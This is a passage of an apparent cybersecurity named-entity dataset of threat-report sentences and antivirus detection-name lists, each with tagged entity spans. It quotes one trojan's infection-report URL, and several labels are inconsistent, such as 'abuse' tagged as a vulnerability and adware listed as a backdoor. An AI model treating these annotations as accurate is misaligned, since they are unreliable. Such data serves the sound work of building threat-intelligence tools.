Trojan.Win32.ShipUp Trojan.ShipUp.ar TR/Offend.46438158 Trojan/Win32.ShipUp Trojan:Win32/Shipup.H Trojan.Win32.A.ShipUp.40960.EO Trojan.Win32.ShipUp.fufz Trojan/Win32.Shipup.R27635 Trojan.ShipUp Trojan.Dropper.FW Trojan.ShipUp!FM//sdnjcwM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003107", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Trojan.Ursnif Trojan.Ransom.99 Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom_HPCRYPMIC.SM2 Ransom_HPCRYPMIC.SM2 BehavesLike.Win32.Ransom.cc Trojan.Win32.Filecoder Trojan:Win32/Wirond.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003108", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameJ9KFZDll.Trojan Adware.Heur.E313D2 Win32.Trojan.WisdomEyes.16070401.9500.9834 Trojan.Adclicker ApplicUnwnt.Win32.Adware.Boran._0 Trojan.DownLoad.6111 not-a-virus:AdWare.Win32.Boran Trojan:Win32/Fexacer.A ADSPY/Superid.A Trojan:Win32/Fexacer.A Trojan/Win32.Popwin.R61755 AdWare.Boran Win32/Adware.Boran", "spans": {"MALWARE: backdoor": 
[[2, 10]]}, "info": {"id": "cyner2_train_003109", "source": "cyner2_train"}} {"text": "Adding in their creative waterholing and poisoned installer tactics, we describe the StrongPity APT as not only determined and well-resourced, but fairly reckless and innovative as well.", "spans": {"THREAT_ACTOR: StrongPity APT": [[85, 99]]}, "info": {"id": "cyner2_train_003110", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O Trojan.Xorist Ransom_Xorist.R029C0DLN17 Win32.Trojan.Filecoder.p W32/Ransom.GEQX-2455 Ransom_Xorist.R029C0DLN17 Trojan-Ransom.Win32.Xorist.lr Trojan.Win32.Xorist.ewkyne Trojan.Win32.Z.Xorist.3077 Troj.Ransom.W32!c Trojan.Win32.Xorist.b Trojan.Encoder.4210 Trojan.Xorist.Win32.1605 Trojan-Ransom.FileCoder Trojan.Xorist.wdr Trojan-Ransom.Win32.Xorist.lr Trojan:Win32/Eksor.A Worm/Win32.Zhelatin.C112256 Hoax.Xorist Trj/CI.A Win32/Filecoder.NFV W32/Filecoder.NFV!tr Win32/Trojan.Xorist.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003111", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Onion.A Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.JIQA-6859 Ransom_.97182692 Trojan.Win32.CZOF.ejtmuo Trojan.Inject2.23490 Ransom_.97182692 BehavesLike.Win32.Ransom.cc TrojanDropper:Win32/Cerber.A Trojan/Win32.Cerber.R182622 Win32/Filecoder.Cerber.B Trojan.Injector!tlnazaf/C8k W32/Injector.DAJC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003113", "source": "cyner2_train"}} {"text": "Security firm ThreatFabric has discovered a new variant of the Xenomorph malware family, which it describes as the most advanced and dangerous Android banking trojans in circulation, and which has new features.", "spans": {"ORGANIZATION: Security firm ThreatFabric": [[0, 26]], "MALWARE: variant": [[48, 55]], "MALWARE: the Xenomorph malware family,": [[59, 88]], "MALWARE: dangerous Android banking trojans": [[133, 166]]}, "info": {"id": 
"cyner2_train_003114", "source": "cyner2_train"}} {"text": "After beginning an investigation into the affiliated malware samples and domains, we quickly came to realization that this group is very likely targeting SCADA-centric victims who are using GE Intelligent Platform's CIMPLICITY HMI solution suite.", "spans": {"MALWARE: malware samples": [[53, 68]], "THREAT_ACTOR: group": [[123, 128]], "ORGANIZATION: SCADA-centric victims": [[154, 175]], "ORGANIZATION: GE Intelligent Platform's": [[190, 215]], "SYSTEM: CIMPLICITY HMI solution suite.": [[216, 246]]}, "info": {"id": "cyner2_train_003116", "source": "cyner2_train"}} {"text": "In the observed campaign, the attackers abuse a feature in Windows called the Windows Troubleshooting Platform WTP, intended for troubleshooting problems, to socially engineer the recipients into executing malware.", "spans": {"THREAT_ACTOR: campaign,": [[16, 25]], "THREAT_ACTOR: attackers": [[30, 39]], "VULNERABILITY: abuse": [[40, 45]], "SYSTEM: Windows": [[59, 66]], "VULNERABILITY: Windows Troubleshooting Platform WTP,": [[78, 115]], "VULNERABILITY: troubleshooting problems,": [[129, 154]]}, "info": {"id": "cyner2_train_003117", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.Yunsip.A5 W32.Yunsip Win32/Tnega.XWcDLN WORM_YUNSIP.SMR Trojan.Win32.FakeMS.tpd Trojan.PWS.Spy.20716 WORM_YUNSIP.SMR TR/PSW.Yunsip.axyza Trojan.Zusy.D56F7 Trojan.Win32.PSWIGames.191268 PWS:Win32/Yunsip.A Trojan/Win32.Infostealer.R758 TScope.Malware-Cryptor.SB Backdoor.Win32.Inject Trj/CI.A Trojan.Win32.FakeUsp10.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003118", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.5316 Trojan.Iframeexec Exploit.Html.Iframe.udgq BehavesLike.Win32.Dropper.wc W32/Trojan.MRKD-5424", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003119", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.FC.316 
MSIL.Backdoor.Orcus.A Trojan.DownLoader24.65022 Win-Trojan/OrcusRAT.Exp", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003121", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Paranoia.240640 Application.Badjoke Riskware.Win32.Paranoia.cckyo JOKE_PARANOIA.A Joke.Paranoia Joke.Paranoia!EAb1BDrutFU Joke.Paranoia Trojan.Win32.E3E61A09 JOKE_PARANOIA.A JOKE/Paranoia.A Win-Trojan/Paranoia.240640 Hacktool.Win32.Paranoia.BA Win32/Joke.13f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003122", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Hacktool.Mimikatz Win64.Riskware.Mimikatz.B Trojan.Win32.Meterpreter.ewppjl Tool.Mimikatz.88 BehavesLike.Win32.Worm.fh HackTool.Win32.Meterpreter HackTool/Win32.Meterpreter Unwanted/Win32.Mimikatz.R175513 Trj/GdSda.A Win32.Hacktool.Meterpreter.Pbfr Win32/Trojan.Hacktool.8d0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003123", "source": "cyner2_train"}} {"text": "It is likely that the analyzed samples were created using the private version, as they are designed to run on modern 64-bit systems, although they could have been built based on sold, leaked or stolen source code.", "spans": {"SYSTEM: modern 64-bit systems,": [[110, 132]]}, "info": {"id": "cyner2_train_003124", "source": "cyner2_train"}} {"text": "In this blog, FireEye Labs dissects this new ATM malware that we have dubbed RIPPER due to the project name ATMRIPPER identified in the sample and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand.", "spans": {"ORGANIZATION: FireEye Labs": [[14, 26]], "MALWARE: ATM malware": [[45, 56]], "MALWARE: RIPPER": [[77, 83]], "MALWARE: ATMRIPPER": [[108, 117]], "MALWARE: malware": [[204, 211]], "ORGANIZATION: ATMs": [[246, 250]], "ORGANIZATION: banks": [[254, 259]]}, "info": {"id": "cyner2_train_003125", "source": 
"cyner2_train"}} {"text": "However, beginning on September 22, 2016, we detected the first large-scale email campaign distributing MarsJoke.", "spans": {"THREAT_ACTOR: email campaign": [[76, 90]], "MALWARE: MarsJoke.": [[104, 113]]}, "info": {"id": "cyner2_train_003127", "source": "cyner2_train"}} {"text": "Exploit kits often integrate new or zero-day exploits in the hopes of getting a larger number of victims with systems that may not be as up-to-date with their patches.", "spans": {"MALWARE: Exploit kits": [[0, 12]], "VULNERABILITY: zero-day exploits": [[36, 53]], "SYSTEM: systems": [[110, 117]]}, "info": {"id": "cyner2_train_003129", "source": "cyner2_train"}} {"text": "A backdoor also known as: TjnSpy.Golroted.S1819456 Trojan.Omaneat.Win32.266 Trojan/Injector.dkxl TSPY_FAREIT.SMBD W32/Omaneat.XICE-5093 TSPY_FAREIT.SMBD Trojan-Spy.MSIL.Omaneat.awa Trojan.Win32.Omaneat.eliuzg BehavesLike.Win32.Trojan.tc Trojan.Win32.Injector W32/Omaneat.Y Trojan[Spy]/MSIL.Omaneat TrojanSpy:MSIL/Golroted.B Trojan.Heur.E613EE Trojan-Spy.MSIL.Omaneat.awa Spyware/Win32.Omaneat.R194942 TrojanSpy.MSIL.Omaneat Trojan.Omaneat Win32/VB.OSK TrojanSpy.Omaneat! W32/Injector.DKXL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003132", "source": "cyner2_train"}} {"text": "Following the identification of this campaign, Mandiant responded to multiple UNC2970 intrusions targeting U.S. 
and European Media organizations through spear-phishing that used a job recruitment theme.", "spans": {"THREAT_ACTOR: campaign,": [[37, 46]], "ORGANIZATION: Mandiant": [[47, 55]], "THREAT_ACTOR: UNC2970": [[78, 85]], "ORGANIZATION: U.S.": [[107, 111]], "ORGANIZATION: European Media organizations": [[116, 144]]}, "info": {"id": "cyner2_train_003133", "source": "cyner2_train"}} {"text": "The conditionally injected script redirects to the Afraidgate campaign, which in turns pushes the Neutrino exploit kit.", "spans": {"THREAT_ACTOR: the Afraidgate campaign,": [[47, 71]], "MALWARE: Neutrino exploit kit.": [[98, 119]]}, "info": {"id": "cyner2_train_003134", "source": "cyner2_train"}} {"text": "A recent tweet mentioned that a new banking malware called Nuclear Bot has started to appear for sale on underground marketplaces.", "spans": {"MALWARE: new banking malware": [[32, 51]], "MALWARE: Nuclear Bot": [[59, 70]], "THREAT_ACTOR: underground marketplaces.": [[105, 130]]}, "info": {"id": "cyner2_train_003136", "source": "cyner2_train"}} {"text": "While the sample is a typical memory scraper, it appears to be hand rolled assembly language and comes in at only 5120 bytes.", "spans": {"MALWARE: memory scraper,": [[30, 45]], "SYSTEM: assembly language": [[75, 92]]}, "info": {"id": "cyner2_train_003139", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.SMSHoax.DT Hoax.Win32.ArchSMS!O Hoax.ArchSMS Joke-ArchSMS.a Hoax.ArchSMS Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/SMShoax.A Win32/SMSSend.A Win.Trojan.Hoax-12 Hoax.Win32.ArchSMS.hzpg Application.SMSHoax.DT Riskware.Win32.Archsms.fuais Win32.Trojan-psw.Archsms.Wrqa Application.SMSHoax.DT Application.SMSHoax.DT Trojan.SMSSend.146 Trojan.ArchSMS.Win32.13 Joke-ArchSMS.a W32/SMShoax.FGEV-2767 JOKE/ArchSMS.A HackTool[Hoax]/Win32.ArchSMS Application.SMSHoax.DT Hoax.Win32.ArchSMS.hzpg Trojan:Win32/Zipparch.F Adware/Win32.SMSHoax.R15838 Trojan.SMS.23205 Application.SMSHoax.B Hoax.Win32.ArchSMS", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003140", "source": "cyner2_train"}} {"text": "In previous instances, Cyble Research and Intelligence Labs CRIL has exposed numerous phishing websites that have been used to steal sensitive data by utilizing a range of malware types, such as stealers, RATs, and bots.", "spans": {"ORGANIZATION: Cyble Research": [[23, 37]], "ORGANIZATION: Intelligence Labs CRIL": [[42, 64]], "MALWARE: malware": [[172, 179]], "MALWARE: stealers, RATs,": [[195, 210]], "MALWARE: bots.": [[215, 220]]}, "info": {"id": "cyner2_train_003141", "source": "cyner2_train"}} {"text": "Early last month, a new variant of mobile ransomware SLocker detected by Trend Micro as ANDROIDOS_SLOCKER.OPST was detected, copying the GUI of the now-infamous WannaCry.", "spans": {"MALWARE: mobile ransomware SLocker": [[35, 60]], "ORGANIZATION: Trend Micro": [[73, 84]], "MALWARE: the now-infamous WannaCry.": [[144, 170]]}, "info": {"id": "cyner2_train_003144", "source": "cyner2_train"}} {"text": "The Sundown exploit kit is a recent addition to the field of EKs, and analysis indicates that it is still in development by its creator.", "spans": {"MALWARE: Sundown exploit kit": [[4, 23]], "MALWARE: EKs,": [[61, 65]], "THREAT_ACTOR: creator.": [[128, 136]]}, "info": {"id": "cyner2_train_003145", "source": "cyner2_train"}} {"text": "Apart from Banker, there are reports indicating that other banking Trojans, are doing the same thing.", "spans": {"MALWARE: Banker,": [[11, 18]], "MALWARE: banking Trojans,": [[59, 75]]}, "info": {"id": "cyner2_train_003146", "source": "cyner2_train"}} {"text": "SamSam is manually deployed ransomware.", "spans": {"MALWARE: SamSam": [[0, 6]], "MALWARE: ransomware.": [[28, 39]]}, "info": {"id": "cyner2_train_003150", "source": "cyner2_train"}} {"text": "The exclusive interest in Japanese government, education, and commerce will likely continue into the future as the group is just starting to build and utilize their existing current 
attack infrastructure.", "spans": {"ORGANIZATION: Japanese government, education, and commerce": [[26, 70]], "SYSTEM: infrastructure.": [[189, 204]]}, "info": {"id": "cyner2_train_003151", "source": "cyner2_train"}} {"text": "With a few unsuccessful exceptions, the notion of locking a Mac device and holding its owner to ransom in return for access to the machine and its data has not yet proven an attractive proposition for attackers.", "spans": {"SYSTEM: Mac device": [[60, 70]], "ORGANIZATION: owner": [[87, 92]], "SYSTEM: machine": [[131, 138]], "THREAT_ACTOR: attackers.": [[201, 211]]}, "info": {"id": "cyner2_train_003153", "source": "cyner2_train"}} {"text": "We call the malware PowerSniff.", "spans": {"MALWARE: malware PowerSniff.": [[12, 31]]}, "info": {"id": "cyner2_train_003154", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/Funsoul.A Worm/W32.Funsoul.45568 W32/Funpo.worm I-Worm.Funsoul!LToVDiOSu1I W32.Funsoul@mm WORM_FUNSOUL.A Email-Worm.Win32.Funsoul Trojan.Win32.Funsoul.empb I-Worm.Win32.S.Funsoul.45568[h] Win32.Worm-email.Funsoul.Lizy Worm.Win32.Funpo.A Worm.Funsoul.Win32.1 WORM_FUNSOUL.A W32/Funpo.worm W32/Risk.JJPZ-6561 Worm:Win32/Funsoul.C W32.W.Funsoul!c Trojan/Win32.HDC Worm.Funsoul Win32/Funpo.A W32/Funsoul.A!worm Win32/Worm.724", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003155", "source": "cyner2_train"}} {"text": "Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel XLSM documents.", "spans": {"THREAT_ACTOR: APT19": [[23, 28]], "MALWARE: macro-enabled": [[47, 60]]}, "info": {"id": "cyner2_train_003156", "source": "cyner2_train"}} {"text": "Its main targets are armed forces, the defense industry, news media, politicians, and dissidents.", "spans": {"ORGANIZATION: armed forces, the defense industry, news media, politicians,": [[21, 81]], "ORGANIZATION: dissidents.": [[86, 97]]}, "info": {"id": "cyner2_train_003158", "source": "cyner2_train"}} {"text": "The Trojan may 
connect to and send infection reports to the following remote location: [http://]46.45.138.138/pw/gate[REMOVED]", "spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_003159", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Downldr2.FRFU Backdoor.Trojan BackDoor.Calla.5 W32/Downloader.KWLG-4153 Backdoor:Win32/Matchaldru.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003160", "source": "cyner2_train"}} {"text": "ESET detections of Android/AdDisplay.Ashas on Android devices by country Is adware harmful ? Because the real nature of apps containing adware is usually hidden to the user , these apps and their developers should be considered untrustworthy .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: Android/AdDisplay.Ashas": [[19, 42]]}, "info": {"id": "cyner2_train_003162", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 TR/AD.Fogels.hochw Trojan.Kazy.D161B6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003166", "source": "cyner2_train"}} {"text": "The malware is delivered via an innovative and unique technique: a downloader we are calling Carp uses malicious macros in Microsoft Excel documents to compile embedded C# C Sharp Programming Language source code into an executable that in turn is run to deploy the Cardinal RAT malware family.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: downloader": [[67, 77]], "MALWARE: Carp": [[93, 97]], "MALWARE: malicious macros": [[103, 119]], "MALWARE: the Cardinal RAT malware family.": [[262, 294]]}, "info": {"id": "cyner2_train_003168", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.QuintesLTU.Trojan Win32.Klez.E@mm Worm/W32.Klez.114688 Email-Worm.Win32.Klez!O W32.Klez.E W32/Klez.e@MM Worm.Klez Worm.Klez.Win32.2 Worm.Klez W32/Klez.E@MM Win32.Worm.Klez.a W32/Klez.E@mm W32.Klez.E@mm Win32/Klez.E 
Win.Worm.Klez-2 Trojan.Win32.Staser.bqjn Win32.Klez.E@mm Trojan.Win32.Klez.gleq Win32.Klez.E@mm Worm.Win32.Klez.E Win32.HLLM.Klez.1 BehavesLike.Win32.Klez.cm Email-Worm.Win32.Klez.E W32/Klez.E@mm Worm/Klez.l W32.Worm.Klez WORM/Klez.E Worm[Email]/Win32.Klez.k Worm:Win32/Klez.E@mm Win32.Klez.EA8AF7 W32.W.Klez.l5N7 Trojan.Win32.Staser.bqjn Win32.Klez.E@mm Win32/Klez.worm.E Win32.Klez.E@mm Win32.HLLW.Klez.e I-Worm.Klez.E Win32/Klez.E I-Worm.Klez!qHFMVAGctoI W32/Klez.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003169", "source": "cyner2_train"}} {"text": "The RAT, which according to compile timestamps first surfaced in November 2012, has been used in targeted intrusions through 2015.", "spans": {"MALWARE: RAT,": [[4, 8]]}, "info": {"id": "cyner2_train_003170", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.1938 W32.Virut.CF Win32/Virut.17408 PE_VIRUX.R Win.Trojan.VB-48987 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg W32.Virut.ltLS Win32.Virut.56 PE_VIRUX.R Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.dd.368640 Virus.Win32.Virut.ce Win32.Virus.Virut.U Win32/Virut.F Virus.Virut.14 Win32/Virut.NBP Virus.Win32.Virut W32/Sality.AO Virus.Win32.Virut.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003171", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Icefog Backdoor.Trojan Backdoor.Win32.Icefog.as Backdoor.W32.Icefog!c BackDoor.Apper.1 BehavesLike.Win32.Downloader.hh W32/Trojan.KWYX-5577 Backdoor.Icefog.a Trojan[Backdoor]/Win32.Icefog Trojan.Johnnie.D5485 Backdoor.Win32.Icefog.as Trj/GdSda.A Win32.Backdoor.Icefog.Hmrl Win32/Trojan.db2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003172", "source": "cyner2_train"}} {"text": "ESET presented our initial findings based on research into the Win32/Potao malware family in June, in our CCCC 2015 presentation in Copenhagen.", "spans": 
{"ORGANIZATION: ESET": [[0, 4]], "MALWARE: malware family": [[75, 89]], "ORGANIZATION: CCCC": [[106, 110]]}, "info": {"id": "cyner2_train_003174", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Adware.YVXR-5520 Trojan.Win32.SMSSend.dqubwq Trojan.Win32.Z.Archsms.1443328 Win32.Risk.Hoax.Alsz ApplicUnwnt.Win32.Hoax.ArchSMS.ACW Trojan.SMSSend.4307 Trojan.ArchSMS.Win32.17489 BehavesLike.Win32.PUP.tc Trojan.Win32.Clustinex Trojan/Win32.Unknown Win32.Troj.Undef.kcloud Trojan.Adware.SMSHoax.105 Trojan/Win32.ArchSMS.R77161 Hoax.ArchSMS!QwEIC3yXiN8 W32/ArchSMS.ACL!tr Win32/Trojan.a32", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003175", "source": "cyner2_train"}} {"text": "The attackers are using social engineering tactics, such as offering coupon vouchers and free software applications like WhatsApp and Avast antivirus, to lure the end user into downloading and installing the malicious payload.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "SYSTEM: free software applications": [[89, 115]], "SYSTEM: WhatsApp": [[121, 129]], "SYSTEM: Avast antivirus,": [[134, 150]], "MALWARE: malicious payload.": [[208, 226]]}, "info": {"id": "cyner2_train_003178", "source": "cyner2_train"}} {"text": "Floki Bot is a new malware variant that has recently been offered for sale on various darknet markets.", "spans": {"MALWARE: Floki Bot": [[0, 9]], "MALWARE: malware variant": [[19, 34]], "THREAT_ACTOR: darknet markets.": [[86, 102]]}, "info": {"id": "cyner2_train_003180", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.WinfarotLTSAAAM.Adware Trojan.SalityStub.F Heur.Trojan.Win32.Small.1!O Trojan.Peels.A Trojan/Small.aljd Trojan.SalityStub.F Win32.Trojan.Small.a W32.Sality!dam TROJ_SALSTUB.SMA Win.Trojan.Small-13502 Trojan.Win32.Small.cpd Trojan.SalityStub.F Trojan.Win32.SalityNHost.99328 Trojan.SalityStub.F TrojWare.Win32.Salrenmetie.A Trojan.SalityStub.F Win32.Sector TROJ_SALSTUB.SMA BehavesLike.Win32.PWSZbot.nm 
Trojan/Win32.Small.cpd Trojan:Win32/Salrenmetie.A Troj.W32.Small.mzKi Trojan.Win32.Small.cpd Trojan.SalityStub.F Trojan/Win32.Small.R10023 Trojan.SalityStub.F TrojanSpy.Zbot!8p0pyjPs4nM Trojan.Win32.Salrenmetie Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003181", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Logger WS.Reputation.1 Trojan-Spy.MSIL.KeyLogger.qle TrojanSpy.KeyLogger!Do8qrKyq4l4 TrojanSpy.MSIL.gka TrojanSpy:MSIL/Keylogger.O Trojan.Spy.Keylogger!4B6E MSIL/Keylogger.BBA!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003182", "source": "cyner2_train"}} {"text": "Usually, Android banking malware is spread with the goal to convince users to install it based on the top rated app name and icon such as Super Mario Run Flash Player or WhatsApp", "spans": {"MALWARE: Android banking malware": [[9, 32]], "SYSTEM: app": [[112, 115]], "MALWARE: Super Mario Run": [[138, 153]], "SYSTEM: Flash Player": [[154, 166]], "SYSTEM: WhatsApp": [[170, 178]]}, "info": {"id": "cyner2_train_003183", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.Davobevix!O Worm.Wahrecks.A8 Trojan/AutoRun.Delf.et Win32.Worm.Autorun.i Win32/Tnega.BQFWNFC Worm.Win32.AutoRun.gzzs Trojan.Win32.Davobevix.crigwr Worm.Win32.Delf.fc Worm:W32/Autorun.OI Win32.HLLW.Autoruner.26228 Worm/Win32.Davobevix Worm:Win32/Wahrecks.A Worm.Win32.AutoRun.gzzs Worm.Win32.Autorun.aee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003184", "source": "cyner2_train"}} {"text": "Poseidon, also known as FindPOS, is a malware family designed for Windows point-of-sale systems.", "spans": {"MALWARE: Poseidon,": [[0, 9]], "MALWARE: FindPOS,": [[24, 32]], "MALWARE: malware": [[38, 45]], "SYSTEM: Windows point-of-sale systems.": [[66, 96]]}, "info": {"id": "cyner2_train_003185", "source": "cyner2_train"}} {"text": "Odin comes after a slight dip over the weekend in the number of 
samples we saw hitting our classifier so perhaps the authors took a break to pull in some changes.", "spans": {"MALWARE: Odin": [[0, 4]], "THREAT_ACTOR: authors": [[117, 124]]}, "info": {"id": "cyner2_train_003186", "source": "cyner2_train"}} {"text": "[Warning] infection of new Linux / Mayhem malware via Wordpress attacks", "spans": {"SYSTEM: Linux": [[27, 32]], "MALWARE: Mayhem malware": [[35, 49]]}, "info": {"id": "cyner2_train_003187", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojanpws.Qqpass.16554 W32/Risk.TFVJ-6880 BehavesLike.Dropper.dc W32/MalwareF.IAIQ Trojan.Win32.Orsam", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003188", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.W.Burn.loBw Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor2.DCBA Win32.Botgor.1 BehavesLike.Win32.Backdoor.gz BehavesLike.Win32.ProcessHijack W32/Backdoor.RIAO-7334 Backdoor:Win32/Botgor.B Win32.Virus.Botgor.Pgwk W32/Botgor.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003191", "source": "cyner2_train"}} {"text": "Also, the executable file is encoded in the Word document as an icon, and when it is executed it infects the system with a malware called ChChes.", "spans": {"SYSTEM: system": [[109, 115]], "MALWARE: malware": [[123, 130]], "MALWARE: ChChes.": [[138, 145]]}, "info": {"id": "cyner2_train_003195", "source": "cyner2_train"}} {"text": "This malicious app, a variant of Android/Twitoor.A, can't be found on any official Android app store – it probably spreads by SMS or via malicious URLs. 
It impersonates a porn player app or MMS application but without having their functionality.", "spans": {"MALWARE: malicious app,": [[5, 19]], "SYSTEM: official Android app store": [[74, 100]]}, "info": {"id": "cyner2_train_003197", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan-GameThief.Lmir.a Heur:Trojan/PSW.WOW TrojanDownloader:Win32/Catinea.B Trojan.Graftor.D45818 Win32.Trojan.Graftor.Fig Trojan.Graftor!27RnMnK6sVU Trojan-GameThief.Win32.WOW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003198", "source": "cyner2_train"}} {"text": "As of October 29, their technical team identified the problem and addressed the issue.", "spans": {"ORGANIZATION: technical team": [[24, 38]]}, "info": {"id": "cyner2_train_003199", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Llac.302593 TrojanPWS.Bropaler Trojan/Delf.opy Win32.Trojan.WisdomEyes.16070401.9500.9990 Trojan.Win32.Llac.kruq Trojan.Win32.Dwn.dzxxnb Troj.W32.Llac!c Trojan.DownLoader14.35508 Trojan.Llac.Win32.55406 BehavesLike.Win32.Worm.dc Trojan.Win32.PSW W32/Trojan.DQFT-9080 Trojan.Llac.bxm Trojan/Win32.Llac Trojan.Inject.2 Trojan.Win32.Llac.kruq PWS:Win32/Bropaler.A!bit Trojan.Llac Trj/GdSda.A Win32.Trojan.Llac.Sudw Trojan.Llac!VJVBvKAFEGg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003200", "source": "cyner2_train"}} {"text": "Proofpoint researchers recently detected a large-scale malvertising attack by the so-called KovCoreG group, best known for distributing Kovter ad fraud malware and sitting atop the affiliate model that distributes Kovter more widely.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "THREAT_ACTOR: KovCoreG group,": [[92, 107]], "MALWARE: Kovter ad fraud malware": [[136, 159]], "MALWARE: Kovter": [[214, 220]]}, "info": {"id": "cyner2_train_003201", "source": "cyner2_train"}} {"text": "Cisco Talos discovered a new malicious campaign from the well known actor Group 74 
aka Tsar Team, Sofacy, APT28, Fancy Bear….", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]], "THREAT_ACTOR: new malicious campaign": [[25, 47]], "THREAT_ACTOR: Group 74": [[74, 82]]}, "info": {"id": "cyner2_train_003202", "source": "cyner2_train"}} {"text": "It maintained a heavy offensive focus on Myanmar, Vietnam, Singapore, the Philippines, Malaysia, and Laos.", "spans": {}, "info": {"id": "cyner2_train_003203", "source": "cyner2_train"}} {"text": "A Chinese advanced persistent threat APT compromised Forbes.com to set up a watering hole style web-based drive-by attack against US Defense and Financial Services firms in late November 2014.", "spans": {"THREAT_ACTOR: Chinese advanced persistent threat APT": [[2, 40]], "VULNERABILITY: watering hole style web-based drive-by attack": [[76, 121]], "ORGANIZATION: US Defense": [[130, 140]], "ORGANIZATION: Financial Services firms": [[145, 169]]}, "info": {"id": "cyner2_train_003204", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor:Win64/Warood.A BDoor.FCXN!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003205", "source": "cyner2_train"}} {"text": "This precedent setting legal case would be followed by many Southeast Asian nations, as well as others around the globe.", "spans": {}, "info": {"id": "cyner2_train_003206", "source": "cyner2_train"}} {"text": "A backdoor also known as: Uds.Dangerousobject.Multi!c Trojan.Graftor.D3CA6C Trojan.Meciv! 
